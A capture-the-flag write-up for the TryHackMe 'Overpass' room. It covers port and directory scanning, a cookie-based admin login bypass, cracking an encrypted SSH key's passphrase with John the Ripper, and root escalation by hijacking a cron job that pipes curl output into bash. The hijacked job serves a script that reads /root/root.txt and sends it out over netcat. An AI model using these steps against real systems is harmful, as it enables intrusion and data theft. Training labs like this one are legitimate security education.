# Overpass ### TryHackMe - [Overpass](https://tryhackme.com/room/overpass) Created by [NinjaJc01](https://tryhackme.com/p/NinjaJc01) ### Scanning (IP : 10.10.233.36) #### 1. NMAP ``` > sudo nmap -sC -sV 10.10.233.36 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 06:30 EDT Nmap scan report for 10.10.233.36 Host is up (0.19s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Overpass Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 39.57 seconds ``` #### 2. GoBuster ``` > gobuster dir -u http://10.10.233.36 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.175.22 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/09/13 07:51:58 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 0] [--> img/] /downloads (Status: 301) [Size: 0] [--> downloads/] /aboutus (Status: 301) [Size: 0] [--> aboutus/] /admin (Status: 301) [Size: 42] [--> /admin/] /css (Status: 301) [Size: 0] [--> css/] =============================================================== 2021/09/13 08:59:14 Finished =============================================================== ``` ### Bypass the Login page. `http://10.10.99.250/admin/` I see a login page with some javascript files in it. In file login.js found a vulnerability. ``` if (statusOrCookie === "Incorrect credentials") { loginStatus.textContent = "Incorrect Credentials" passwordBox.value="" } else { Cookies.set("SessionToken",statusOrCookie) window.location = "/admin" } } ``` I try to set value `SessionToken` empty in cookie and BOOM !!. I logged in as admin. I says > ## Welcome to the Overpass Administrator area > > #### A secure password manager with support for Windows, Linux, MacOS and more > > Since you keep forgetting your password, James, I've set up SSH keys for you. > > If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.\ > Also, we really need to talk about this "Military Grade" encryption. - Paradox > > ``` > -----BEGIN RSA PRIVATE KEY----- > Proc-Type: 4,ENCRYPTED > DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 > > LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN > JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal > 73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT > WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv > BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ > AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR > 3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf > ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk > VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR > OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P > 9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze > eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ > 4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8 > GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn > exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy > AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk > 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58 > dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i > n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT > 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K > 4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z > ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS > 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2 > +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk > 2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7 > -----END RSA PRIVATE KEY----- > ``` ### Decoding the SSH Private Key To Decode the SSH key I use JohnTheRipper Tool in Kali-Linux. First to convert RSA key to hash I use [ssh2john.py](https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py) script. ``` python ssh2john.py id_rsa > id_rsa.hash ``` Now to crack the hash. ``` > john id_rsa.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance. Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist Proceeding with incremental:ASCII james13 (id_rsa) ``` Passphrase for private key is `james13`. Now to decode it use - ``` openssl rsa -in id_rsa -out out.key -passin pass:james13 ``` ### Login to SSH and get user.txt By the description of admin page it is clear that username is `james`. ``` ssh -i out.key james@10.10.175.22 -p 22 ``` Now for user.txt - ``` cat user.txt ``` ### Privileges **escalations** (root.txt) There is a weird file `todo.txt` in `james` home directory. It gives a hint to see cronjobs. And a weird thing is there in crontabs file. ``` * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash ``` Then I see that I can edit the /etc/hosts file and change the IP of `overpass.thm`domain to my machine and then I can serve any malacious file to run n server as a root. #### buildscript.sh ``` #!/bin/sh cat /root/root.txt | nc 1234 ``` Then I run a python server sering file `/downloads/src/buildscript.sh` on port 80. ``` python3 -m http.server 80 ``` And open a netcat listner to listine the flag echo by vulnerable machine. ``` nc -lnvp 1234 ``` And BOOM!! it gives the content of `root.txt` file. ## THANK YOU FOR READING :)